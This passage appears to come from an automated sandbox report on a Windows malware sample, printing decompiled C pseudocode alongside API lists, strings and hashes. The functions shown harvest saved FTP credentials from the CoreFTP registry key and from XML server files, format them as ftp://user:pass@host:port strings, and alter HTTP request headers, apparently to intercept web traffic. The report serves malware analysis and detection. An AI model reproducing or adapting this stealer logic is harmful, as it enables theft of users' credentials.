                						_t73 =  *((intOrPtr*)( *_t72 + 0x94))(_t72, L"Host",  &_v564);
                						__eflags = _t73;
                						if(_t73 != 0) {
                							_v584 = 0;
                						} else {
                							_v584 = E004100F7(_t106,  &_v576);
                						}
                						_t74 = _v596;
                						_t107 =  *_t74;
                						_t75 =  *((intOrPtr*)( *_t74 + 0x94))(_t74, L"Port",  &_v568);
                						__eflags = _t75;
                						if(_t75 != 0) {
                							_v600 = 0;
                						} else {
                							_v600 = E004100F7(_t107,  &_v580);
                						}
                						_t76 = _v608;
                						_t108 =  *_t76;
                						_t77 =  *((intOrPtr*)( *_t76 + 0x94))(_t76, L"User",  &_v572);
                						__eflags = _t77;
                						if(_t77 != 0) {
                							_t124 = 0;
                							__eflags = 0;
                						} else {
                							_t124 = E004100F7(_t108,  &_v584);
                						}
                						_t78 = _v620;
                						_t109 =  *_t78;
                						_t79 =  *((intOrPtr*)( *_t78 + 0x94))(_t78, L"Pass",  &_v596);
                						__eflags = _t79;
                						if(_t79 != 0) {
                							_t129 = 0;
                							__eflags = 0;
                						} else {
                							_t129 = E004100F7(_t109,  &_v608);
                						}
                						_t80 = _v620;
                						__eflags = _t80;
                						if(_t80 != 0) {
                							__eflags =  *_t80;
                							if( *_t80 == 0) {
                								L34:
                								__imp__#6(_v620);
                								goto L35;
                							}
                							__eflags = _t124;
                							if(_t124 == 0) {
                								goto L34;
                							}
                							__eflags =  *_t124;
                							if( *_t124 == 0) {
                								goto L34;
                							}
                							__eflags = _t129;
                							if(_t129 == 0) {
                								goto L34;
                							}
                							__eflags =  *_t129;
                							if( *_t129 == 0) {
                								goto L34;
                							}
                							_t85 = _v624;
                							__eflags = _v624;
                							if(_v624 == 0) {
                								_t86 = 0;
                								__eflags = 0;
                							} else {
                								_t86 = E00409E66(_t85);
                							}
                							__eflags = _t86 - 1;
                							if(_t86 < 1) {
                								L29:
                								_t86 = 0x15;
                								goto L30;
                							} else {
                								__eflags = _t86 - 0xffff;
                								if(_t86 <= 0xffff) {
                									L30:
                									_push(_t86);
                									_push(_v620);
                									_push(_t129);
                									_v616 = 0;
                									_t88 = E0040A532( &_v616, L"ftp://%s:%s@%s:%u\n", _t124);
                									_t136 = _t136 + 0x18;
                									__eflags = _t88;
                									if(_t88 > 0) {
                										_t90 = E00409B2A(_t88, _a4, _v616);
                										__eflags = _t90;
                										if(_t90 != 0) {
                											_t91 = _a4;
                											_t44 = _t91 + 4;
                											 *_t44 =  *((intOrPtr*)(_t91 + 4)) + 1;
                											__eflags =  *_t44;
                										}
                									}
                									E004097F7(_v616);
                									goto L34;
                								}
                								goto L29;
                							}
                						}
                						L35:
                						__eflags = _v624;
                						if(_v624 != 0) {
                							__imp__#6(_v624);
                						}
                						__eflags = _t124;
                						if(_t124 != 0) {
                							__imp__#6(_t124);
                						}
                						__eflags = _t129;
                						if(_t129 != 0) {
                							__imp__#6(_t129);
                						}
                						_t81 = _v632;
                						 *((intOrPtr*)( *_t81 + 8))(_t81);
                						_t83 = _v632;
                						_t84 =  *((intOrPtr*)( *_t83 + 0x24))(_t83,  &_v636);
                						__eflags = _t84;
                					} while (_t84 == 0);
                					_t128 = _v612;
                					goto L43;
                				}
                				_v560 = L"*.xml";
                				E0040B4D8( &_v524,  &_v560, _t139, 1, 5, E00405E5C, _a4, 0, 0, 0);
                				goto L45;
			}

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
• Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
                • String ID: *.xml$/*/*/Server$Host$Pass$Port$User$ftp://%s:%s@%s:%u
                • API String ID: 1075381090-553961098
                • Opcode ID: de0e0347b45dc37dadd9a3df54c9eb0ca660de002745cf8317f03369b2f122ad
                • Instruction ID: af0a7c8d25671063b214f6480466bc12bacc176a869f1f943aa692b72e7dd54f
                • Opcode Fuzzy Hash: de0e0347b45dc37dadd9a3df54c9eb0ca660de002745cf8317f03369b2f122ad
                • Instruction Fuzzy Hash: 5E618B71204342AFC710EF65C88496BB7E8EF88348F04493EF586A72A1D779DD45CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00413618(void* __ecx, void* __edx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                				intOrPtr _v16;
                				signed char* _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				char _v60;
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v73;
                				intOrPtr _v76;
                				signed int _v116;
                				char _v121;
                				void* __ebx;
                				void* __esi;
                				signed char _t76;
                				signed int _t79;
                				intOrPtr _t80;
                				signed int _t89;
                				intOrPtr _t90;
                				intOrPtr _t94;
                				intOrPtr _t96;
                				intOrPtr _t97;
                				intOrPtr _t98;
                				intOrPtr _t99;
                				intOrPtr _t100;
                				intOrPtr _t101;
                				signed char* _t102;
                				signed int _t103;
                				signed int _t108;
                				intOrPtr _t112;
                				signed int _t126;
                				signed int _t132;
                
                				_v72 = _v72 | 0xffffffff;
                				_t105 =  &_v60;
                				if(E00413547( &_v60, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
                					L22:
                					E004047CF( &_v60);
                					return _v72;
                				}
                				_t76 = E00404065(__edx, _t105);
                				_v64 = _t76;
                				if((_t76 & 0x00000001) == 0) {
                					__eflags = _t76 & 0x00000002;
                					if((_t76 & 0x00000002) == 0) {
                						L17:
                						__eflags = _v64 & 0x00000004;
                						if((_v64 & 0x00000004) == 0) {
                							goto L22;
                						}
                						 *_a8 = _v28;
                						 *_a12 = _v24;
                						EnterCriticalSection(0x41aa38);
                						_t124 = _a4;
                						_t79 = E00412CBF(_a4);
                						__eflags = _t79 - 0xffffffff;
                						if(_t79 != 0xffffffff) {
                							L20:
                							_t80 =  *0x41aa50; // 0x0
                							_t126 = _t79 * 0x24;
                							__eflags = _t126;
                							E004097F7( *((intOrPtr*)(_t126 + _t80 + 8)));
                							_t112 =  *0x41aa50; // 0x0
                							 *((intOrPtr*)(_t126 + _t112 + 8)) = _v32;
                							L21:
                							LeaveCriticalSection(0x41aa38);
                							goto L22;
                						}
                						_t79 = E00412CE5(_t79, _t124);
                						__eflags = _t79 - 0xffffffff;
                						if(_t79 == 0xffffffff) {
                							goto L21;
                						}
                						goto L20;
                					}
                					_v68 = _v68 & 0x00000000;
                					_v73 = 1;
                					__eflags = _v16 - 1;
                					if(_v16 != 1) {
                						L9:
                						HttpAddRequestHeadersA(_a4, "Accept-Encoding: identity\r\n", 0xffffffff, 0xa0000000);
                						HttpAddRequestHeadersA(_a4, "TE:\r\n", 0xffffffff, 0x80000000);
                						HttpAddRequestHeadersA(_a4, "If-Modified-Since:\r\n", 0xffffffff, 0x80000000);
                						_t108 = _v116;
                						L10:
                						EnterCriticalSection(0x41aa38);
                						__eflags = _v121;
                						if(_v121 == 0) {
                							L14:
                							E00404821(_v64, _v68);
                							__eflags = _t108;
                							if(_t108 != 0) {
                								E0040AA7C(_t108);
                							}
                							L16:
                							LeaveCriticalSection(0x41aa38);
                							goto L17;
                						}
                						_t130 = _a4;
                						_t89 = E00412CBF(_a4);
                						__eflags = _t89 - 0xffffffff;
                						if(_t89 != 0xffffffff) {
                							L13:
                							_t90 =  *0x41aa50; // 0x0
                							_t132 = _t89 * 0x24;
                							E00404821( *((intOrPtr*)(_t90 + _t132 + 0x10)),  *((intOrPtr*)(_t90 + _t132 + 0xc)));
                							_t94 =  *0x41aa50; // 0x0
                							E004097F7( *((intOrPtr*)(_t132 + _t94 + 0x14)));
                							_t96 =  *0x41aa50; // 0x0
                							 *(_t132 + _t96 + 0x14) =  *(_t132 + _t96 + 0x14) & 0x00000000;
                							_t97 =  *0x41aa50; // 0x0
                							 *(_t132 + _t97 + 0x1c) =  *(_t132 + _t97 + 0x1c) & 0x00000000;
                							_t98 =  *0x41aa50; // 0x0
                							 *(_t132 + _t98 + 0x18) =  *(_t132 + _t98 + 0x18) | 0xffffffff;
                							_t99 =  *0x41aa50; // 0x0
                							 *((intOrPtr*)(_t132 + _t99 + 0xc)) = _v76;
                							_t100 =  *0x41aa50; // 0x0
                							 *((intOrPtr*)(_t132 + _t100 + 0x10)) = _v72;
                							_t101 =  *0x41aa50; // 0x0
                							 *(_t132 + _t101 + 0x20) = _t108;
                							goto L16;
                						}
                						_t89 = E00412CE5(_t89, _t130);
                						__eflags = _t89 - 0xffffffff;
                						if(_t89 == 0xffffffff) {
                							goto L14;
                						}
                						goto L13;
                					}
                					_t102 = _v20;
                					__eflags =  *_t102 & 0x00000003;
                					if(( *_t102 & 0x00000003) == 0) {
                						goto L9;
                					}
                					_t103 = E00404A58(_t102,  &_v60);
                					_t108 = _t103;
                					__eflags = _t108;
                					if(_t108 != 0) {
                						_v72 = 1;
                					} else {
                						_v73 = _t103;
                					}
                					goto L10;
                				} else {
                					SetLastError(0x2f78);
                					_v72 = _v72 & 0x00000000;
                					goto L22;
                				}
			}

                APIs
                • SetLastError.KERNEL32(00002F78), ref: 0041365B
                • EnterCriticalSection.KERNEL32(0041AA38), ref: 004136EA
                • LeaveCriticalSection.KERNEL32(0041AA38,?), ref: 00413793
                • EnterCriticalSection.KERNEL32(0041AA38), ref: 004137B3
                • LeaveCriticalSection.KERNEL32(0041AA38,?), ref: 004137F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
• Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$EnterLeave$ErrorLast
                • String ID: Accept-Encoding: identity$If-Modified-Since:$TE:
                • API String ID: 486337731-293905274
                • Opcode ID: 33f713bbdb83d50b8c403e7e229795024a9561d0fec858e20a63a71a0b185156
                • Instruction ID: 1cd726cbec2ef1576728a0196138e0f80e3f9181544a3ce7a3713ae4c56018a4
                • Opcode Fuzzy Hash: 33f713bbdb83d50b8c403e7e229795024a9561d0fec858e20a63a71a0b185156
                • Instruction Fuzzy Hash: 2751CA711043009FC721DF28DD85AAA7BE4BF45369F00862EF9A5A73E1C7389D55CB8A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00414C47(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v44;
                				signed int _v60;
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int _v84;
                				intOrPtr _v88;
                				signed int _v92;
                				intOrPtr _v112;
                				void* __esi;
                				signed int _t113;
                				signed int _t115;
                				signed int _t116;
                				signed int _t117;
                				void* _t119;
                				signed int _t123;
                				signed int _t124;
                				signed char _t128;
                				signed int _t131;
                				signed char _t132;
                				signed char _t138;
                				intOrPtr _t151;
                				signed int _t167;
                				void* _t173;
                				void* _t180;
                				intOrPtr _t181;
                				signed int _t187;
                				void* _t189;
                				void* _t191;
                				signed int _t205;
                				signed int _t206;
                
                				_t180 = __edx;
                				E00407B30();
                				if(E00407B3F() == 0 || _a8 == 0 || _a12 <= 0) {
                					L9:
                					_t113 =  *0x41ac28(_a4, _a8, _a12);
                					goto L10;
                				} else {
                					EnterCriticalSection(0x41ac38);
                					_t195 = _a4;
                					_t187 = E0041400F(_a4);
                					_v68 = _t187;
                					if(_t187 == 0xffffffff) {
                						L8:
                						LeaveCriticalSection(0x41ac38);
                						goto L9;
                					}
                					_t189 = _t187 * 0x38 +  *0x41ac54;
                					if( *((intOrPtr*)(_t189 + 0x20)) > 0) {
                						L29:
                						_t115 =  *(_t189 + 0x24);
                						_t191 =  *((intOrPtr*)(_t189 + 0x20)) - _t115;
                						LeaveCriticalSection(0x41ac38);
                						_t198 = _a4;
                						_t116 =  *0x41ac28(_a4,  *((intOrPtr*)(_t189 + 0x1c)) + _t115, _t191);
                						_v72 = _t116;
                						__eflags = _t116 - 0xffffffff;
                						if(_t116 != 0xffffffff) {
                							EnterCriticalSection(0x41ac38);
                							_t117 = E0041400F(_t198);
                							__eflags = _t117 - 0xffffffff;
                							if(_t117 != 0xffffffff) {
                								_t167 = _v72;
                								_t119 = _t117 * 0x38 +  *0x41ac54;
                								__eflags = _t167 - _t191;
                								if(_t167 != _t191) {
                									 *((intOrPtr*)(_t119 + 0x24)) =  *((intOrPtr*)(_t119 + 0x24)) + _t167;
                									_t93 = _t119 + 0x28;
                									 *_t93 =  *(_t119 + 0x28) - 1;
                									__eflags =  *_t93;
                									_v72 = 1;
                								} else {
                									_t89 = _t119 + 0x1c; // -4303928
                									_v72 =  *(_t119 + 0x28);
                									E004097F7( *_t89);
                									E00409898(_t89, 0x10);
                								}
                							} else {
                								_v72 = _v72 | _t117;
                								 *0x41ac34(0xffffe890, 8);
                							}
                							LeaveCriticalSection(0x41ac38);
                						}
                						L36:
                						_t113 = _v72;
                						L10:
                						return _t113;
                					}
                					if( *(_t189 + 8) > 0) {
                						L38:
                						LeaveCriticalSection(0x41ac38);
                						_t200 = _a4;
                						_t123 =  *0x41ac28(_a4, _a8, _a12);
                						_v72 = _t123;
                						__eflags = _t123 - 0xffffffff;
                						if(_t123 != 0xffffffff) {
                							EnterCriticalSection(0x41ac38);
                							_t124 = E0041400F(_t200);
                							__eflags = _t124 - 0xffffffff;
                							if(_t124 != 0xffffffff) {
                								_t173 = _t124 * 0x38 +  *0x41ac54;
                								_t181 =  *((intOrPtr*)(_t173 + 8));
                								__eflags = _v72 - _t181;
                								if(_v72 > _t181) {
                									E004140CB(_t124);
                								} else {
                									 *((intOrPtr*)(_t173 + 8)) = _t181 - _v72;
                								}
                							} else {
                								_v72 = _v72 | _t124;
                								 *0x41ac34(0xffffe890, 8);
                							}
                							LeaveCriticalSection(0x41ac38);
                						}
                						goto L36;
                					}
                					_t176 = _a8;
                					_t128 = E004141DC(_a12, _a8,  &_v60, _t195);
                					_v68 = _t128;
                					if(_t128 != 0xffffffff) {
                						__eflags = _v60;
                						if(_v60 == 0) {
                							L37:
                							E004047CF( &_v60);
                							_t131 = _v64 + _a12;
                							__eflags = _t131;
                							 *(_t189 + 8) = _t131;
                							goto L38;
                						}
                						_t132 = E00404065(_t180,  &_v60);
                						_v68 = _t132;
                						__eflags = _t132 & 0x00000001;
                						if((_t132 & 0x00000001) == 0) {
                							_v76 = _v76 & 0x00000000;
                							_v72 = _v72 & 0x00000000;
                							__eflags = _t132 & 0x00000002;
                							if(__eflags != 0) {
                								_t206 = E0040984A(__eflags, _a8, _a12);
                								_v84 = _t206;
                								__eflags = _t206;
                								if(_t206 != 0) {
                									E00404821( *((intOrPtr*)(_t189 + 0x10)),  *((intOrPtr*)(_t189 + 0xc)));
                									E004097F7( *(_t189 + 0x14));
                									E004097F7( *((intOrPtr*)(_t189 + 4)));
                									_t151 = E00409B94(_v64, _v68);
                									 *(_t189 + 0x14) =  *(_t189 + 0x14) & 0x00000000;
                									_t39 = _t189 + 0x18;
                									 *_t39 =  *(_t189 + 0x18) & 0x00000000;
                									__eflags =  *_t39;
                									 *((intOrPtr*)(_t189 + 4)) = _t151;
                									 *((intOrPtr*)(_t189 + 0xc)) = _v36;
                									 *((intOrPtr*)(_t189 + 0x10)) = _v32;
                									_v112 = E0040FDE7(E0040FDE7(E0040FE63(_t206, _a12, "Accept-Encoding", "identity"), _t176, _t206, "TE"), _t176, _t206, "If-Modified-Since");
                								} else {
                									E00404821(_v16, _v20);
                								}
                							}
                							__eflags = _v68 & 0x00000004;
                							if((_v68 & 0x00000004) == 0) {
                								L27:
                								__eflags = _v76;
                								if(_v76 == 0) {
                									goto L37;
                								}
                								E004047CF( &_v60);
                								_t71 = _t189 + 0x24;
                								 *_t71 =  *(_t189 + 0x24) & 0x00000000;
                								__eflags =  *_t71;
                								 *(_t189 + 8) = _v64;
                								 *((intOrPtr*)(_t189 + 0x1c)) = _v76;
                								 *((intOrPtr*)(_t189 + 0x20)) = _v72;
                								 *(_t189 + 0x28) = _a12;
                								goto L29;
                							}
                							_t205 = _v76;
                							__eflags = _t205;
                							if(_t205 != 0) {
                								_t138 = _v72;
                							} else {
                								_t205 = _a8;
                								_t138 = _a12;
                							}
                							_v68 = _t138;
                							_v88 = E0041447E(_v68, _t205, _v28, _v24,  &_v76);
                							E004097F7(_v44);
                							__eflags = _v92;
                							if(_v92 != 0) {
                								__eflags = _t205 - _a8;
                								if(_t205 != _a8) {
                									E004097F7(_t205);
                								}
                							} else {
                								__eflags = _t205 - _a8;
                								if(_t205 == _a8) {
                									goto L37;
                								}
                								_v76 = _t205;
                								_v72 = _v68;
                							}
                							goto L27;
                						} else {
                							E004047CF( &_v60);
                							LeaveCriticalSection(0x41ac38);
                							_t113 =  *0x41ac34(0xffffe8a3, 0) | 0xffffffff;
                							goto L10;
                						}
                					} else {
                						E004140CB(_v68);
                						E004047CF( &_v60);
                						goto L8;
                					}
                				}
			}
                0x00414d4f
                0x00414d51
                0x00414d68
                0x00414d70
                0x00414d78
                0x00414d85
                0x00414d8a
                0x00414d8e
                0x00414d8e
                0x00414d8e
                0x00414d97
                0x00414da6
                0x00414dae
                0x00414dce
                0x00414d53
                0x00414d5b
                0x00414d5b
                0x00414d51
                0x00414dd2
                0x00414dd7
                0x00414e3e
                0x00414e3e
                0x00414e43
                0x00000000
                0x00000000
                0x00414e4d
                0x00414e56
                0x00414e56
                0x00414e56
                0x00414e5a
                0x00414e61
                0x00414e68
                0x00414e6e
                0x00000000
                0x00414e6e
                0x00414dd9
                0x00414ddd
                0x00414ddf
                0x00414de9
                0x00414de1
                0x00414de1
                0x00414de4
                0x00414de4
                0x00414ded
                0x00414e0c
                0x00414e10
                0x00414e15
                0x00414e1a
                0x00414e33
                0x00414e36
                0x00414e39
                0x00414e39
                0x00414e1c
                0x00414e1c
                0x00414e1f
                0x00000000
                0x00000000
                0x00414e29
                0x00414e2d
                0x00414e2d
                0x00000000
                0x00414d0c
                0x00414d0c
                0x00414d12
                0x00414d27
                0x00000000
                0x00414d27
                0x00414cc2
                0x00414cc6
                0x00414ccb
                0x00000000
                0x00414ccb
                0x00414cc0

                APIs
                  • Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38
                  • Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47
                • EnterCriticalSection.KERNEL32(0041AC38), ref: 00414C73
                • LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414CD1
                • LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414D12
                • LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414E7F
                • EnterCriticalSection.KERNEL32(0041AC38), ref: 00414E9E
                • LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414EFE
                • LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414F29
                • EnterCriticalSection.KERNEL32(0041AC38), ref: 00414F48
                • LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414F90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$Leave$Enter$ObjectSingleWait
                • String ID: Accept-Encoding$If-Modified-Since$identity
                • API String ID: 3286975823-3034467039
                • Opcode ID: 6b75ca8fcb1d5dd1ae7d7aaccec484ad8a2ee9c86435da5fa1e5b11890c606e4
                • Instruction ID: 5d395e0899c0315ea4f0436bca466b8aaf046ffc41b85865ac9f3a483485f5e4
                • Opcode Fuzzy Hash: 6b75ca8fcb1d5dd1ae7d7aaccec484ad8a2ee9c86435da5fa1e5b11890c606e4
                • Instruction Fuzzy Hash: 6BA1A2715053019FC710EF24DD45A9EBBE1BFC8324F104A2EF554A32A1D738E995CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E00406929(void* __edx) {
                				void* _v8;
                				char _v12;
                				void* _v16;
                				int _v20;
                				char _v24;
                				char _v28;
                				intOrPtr _v32;
                				char _v556;
                				void* __edi;
                				void* __esi;
                				void* _t40;
                				void* _t44;
                				char _t51;
                				intOrPtr _t55;
                				intOrPtr _t57;
                				intOrPtr _t58;
                				void* _t60;
                				void* _t61;
                				intOrPtr _t63;
                				intOrPtr _t64;
                				intOrPtr _t75;
                				void* _t76;
                
                				_t70 = __edx;
                				E004098AA( &_v28,  &_v28, 0, 8);
                				_t40 = HeapAlloc( *0x41a570, 8, 0xc20);
                				_v16 = _t40;
                				if(_t40 == 0) {
                					return _t40;
                				}
                				_v32 = _t40 + 0x3fc;
                				if(RegOpenKeyExW(0x80000001, L"SOFTWARE\\ftpware\\coreftp\\sites", 0, 8,  &_v8) != 0) {
                					L19:
                					_t44 = E004097F7(_v16);
                					_t80 = _v24;
                					if(_v24 > 0) {
                						E00412508(_t44, _v28, _t70, _t80, L"CoreFTP");
                					}
                					return E004097F7(_v28);
                				} else {
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push( &_v12);
                					_push( &_v556);
                					_v20 = 0;
                					_push(0);
                					while(1) {
                						_v12 = 0x104;
                						if(RegEnumKeyExW(_v8, ??, ??, ??, ??, ??, ??, ??) != 0) {
                							break;
                						}
                						_t73 = _v16;
                						_v20 = _v20 + 1;
                						_t51 = E0040ED7B(0xff, _v16, _v8,  &_v556, L"host");
                						_v12 = _t51;
                						__eflags = _t51 - 0xffffffff;
                						if(_t51 == 0xffffffff) {
                							L16:
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							_push( &_v12);
                							_push( &_v556);
                							_push(_v20);
                							continue;
                						}
                						__eflags = _t51;
                						if(_t51 <= 0) {
                							goto L16;
                						}
                						_t55 = E0040ED7B(0xff, _t73 + 0x1fe, _v8,  &_v556, L"user");
                						_v12 = _t55;
                						__eflags = _t55 - 0xffffffff;
                						if(_t55 == 0xffffffff) {
                							goto L16;
                						}
                						__eflags = _t55;
                						if(_t55 <= 0) {
                							goto L16;
                						}
                						_t75 = _v32;
                						_t57 = E0040ED7B(0xff, _t75, _v8,  &_v556, L"pw");
                						_v12 = _t57;
                						__eflags = _t57 - 0xffffffff;
                						if(_t57 == 0xffffffff) {
                							goto L16;
                						}
                						__eflags = _t57;
                						if(_t57 <= 0) {
                							goto L16;
                						}
                						_t68 = _t75;
                						_t58 = E0040A3AA(_t75);
                						__eflags = _t58;
                						if(_t58 <= 0) {
                							goto L16;
                						}
                						_t60 = E0040EDD3(_t68, _v8,  &_v556, L"port");
                						__eflags = _t60 - 1;
                						if(_t60 < 1) {
                							L12:
                							_t60 = 0x15;
                							L13:
                							_push(_t60);
                							_t61 = _v16;
                							_push(_t61);
                							_push(_t75);
                							_push(_t61 + 0x1fe);
                							_t70 = 0x311;
                							_t72 = _t75 + 0x1fe;
                							_t63 = E0040A4B7(_t61 + 0x1fe, 0x311, _t75 + 0x1fe, L"ftp://%s:%s@%s:%u\n");
                							_t76 = _t76 + 0x14;
                							__eflags = _t63;
                							if(_t63 > 0) {
                								_t64 = E00409B2A(_t63,  &_v28, _t72);
                								__eflags = _t64;
                								if(_t64 != 0) {
                									_t26 =  &_v24;
                									 *_t26 = _v24 + 1;
                									__eflags =  *_t26;
                								}
                							}
                							goto L16;
                						}
                						__eflags = _t60 - 0xffff;
                						if(_t60 <= 0xffff) {
                							goto L13;
                						}
                						goto L12;
                					}
                					RegCloseKey(_v8);
                					goto L19;
                				}
                			}
                0x00406929
                0x0040693e
                0x00406950
                0x00406956
                0x0040695b
                0x00406ae3
                0x00406ae3
                0x00406966
                0x00406982
                0x00406abd
                0x00406ac0
                0x00406ac5
                0x00406ac8
                0x00406ad2
                0x00406ad2
                0x00000000
                0x00406988
                0x00406988
                0x00406989
                0x0040698a
                0x0040698b
                0x0040698f
                0x00406996
                0x00406997
                0x0040699a
                0x00406a9c
                0x00406a9f
                0x00406aae
                0x00000000
                0x00000000
                0x004069a0
                0x004069a3
                0x004069ba
                0x004069bf
                0x004069c2
                0x004069c5
                0x00406a8a
                0x00406a8a
                0x00406a8b
                0x00406a8c
                0x00406a8d
                0x00406a91
                0x00406a98
                0x00406a99
                0x00000000
                0x00406a99
                0x004069cb
                0x004069cd
                0x00000000
                0x00000000
                0x004069e8
                0x004069ed
                0x004069f0
                0x004069f3
                0x00000000
                0x00000000
                0x004069f9
                0x004069fb
                0x00000000
                0x00000000
                0x00406a01
                0x00406a13
                0x00406a18
                0x00406a1b
                0x00406a1e
                0x00000000
                0x00000000
                0x00406a20
                0x00406a22
                0x00000000
                0x00000000
                0x00406a24
                0x00406a26
                0x00406a2b
                0x00406a2d
                0x00000000
                0x00000000
                0x00406a3e
                0x00406a43
                0x00406a46
                0x00406a4f
                0x00406a51
                0x00406a52
                0x00406a52
                0x00406a53
                0x00406a56
                0x00406a57
                0x00406a5d
                0x00406a63
                0x00406a68
                0x00406a6e
                0x00406a73
                0x00406a76
                0x00406a78
                0x00406a7e
                0x00406a83
                0x00406a85
                0x00406a87
                0x00406a87
                0x00406a87
                0x00406a87
                0x00406a85
                0x00000000
                0x00406a78
                0x00406a48
                0x00406a4d
                0x00000000
                0x00000000
                0x00000000
                0x00406a4d
                0x00406ab7
                0x00000000
                0x00406ab7

                APIs
                • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00406950
                • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\ftpware\coreftp\sites,00000000,00000008,?), ref: 0040697A
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00406AA6
                • RegCloseKey.ADVAPI32(?), ref: 00406AB7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AllocCloseEnumHeapOpen
                • String ID: CoreFTP$SOFTWARE\ftpware\coreftp\sites$ftp://%s:%s@%s:%u$host$port$user
                • API String ID: 3497950970-3090913592
                • Opcode ID: 3e742d8d345e02e9aca0361be674e097ef32b1db3b0ac7a563214aaf2679d49c
                • Instruction ID: fc2830438999c0e0f7ab349c7f10e4ddf1b9293e4bcbd5b135396d6ce1e7e282
                • Opcode Fuzzy Hash: 3e742d8d345e02e9aca0361be674e097ef32b1db3b0ac7a563214aaf2679d49c
                • Instruction Fuzzy Hash: 3F415C71A00109BEEB10ABE1CC85EEF767CEB05314F204577F612B22E1D6789E958B68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00408E58(void* __ecx, void* __eflags) {
                				char _v1164;
                				char _v1668;
                				char _v1676;
                				short _v1684;
                				char _v2192;
                				char _v2196;
                				short _v2204;
                				char _v2716;
                				char _v2724;
                				char _v2988;
                				short _v3076;
                				char _v3084;
                				char _v3085;
                				char _v3088;
                				char _v3101;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				WCHAR* _t61;
                				WCHAR* _t62;
                				WCHAR* _t63;
                				WCHAR* _t64;
                				void* _t67;
                
                				_t57 = __ecx;
                				_push(_t67);
                				_t61 =  &_v1668;
                				E00407BD4(__ecx, _t61, _t67, 0);
                				PathRemoveFileSpecW(_t61);
                				_t62 =  &_v2192;
                				E00407BD4(_t57, _t62, PathRemoveFileSpecW, 1);
                				PathRemoveFileSpecW(_t62);
                				 *0x4192d0 =  *0x4192d0 | 0x00000002;
                				_push(0);
                				E00408473();
                				E004079D9(0xff220823,  &_v3088, 0);
                				_v3101 = 0;
                				_t63 = L"Software\\Microsoft\\Windows\\Currentversion\\Run";
                				while(SHDeleteValueW(0x80000001, _t63,  &_v3076) == 0) {
                					Sleep(0x1f4);
                					if(E0040EF91(_t57, _t63,  &_v3084) != 0) {
                						_v3085 = _v3085 + 1;
                						_t81 = _v3085 - 5;
                						if(_v3085 < 5) {
                							continue;
                						}
                					}
                					break;
                				}
                				E0040B41D( &_v1676, _t81);
                				E0040B41D( &_v2196, _t81);
                				_t64 =  &_v2716;
                				E00407BD4( &_v2196, _t64, 0x80000001, 2);
                				SHDeleteKeyW(0x80000001, _t64);
                				CharToOemW( &_v1684,  &_v2724);
                				CharToOemW( &_v2204,  &_v2988);
                				_push( &_v2988);
                				_push( &_v2724);
                				_push( &_v2988);
                				_push( &_v2724);
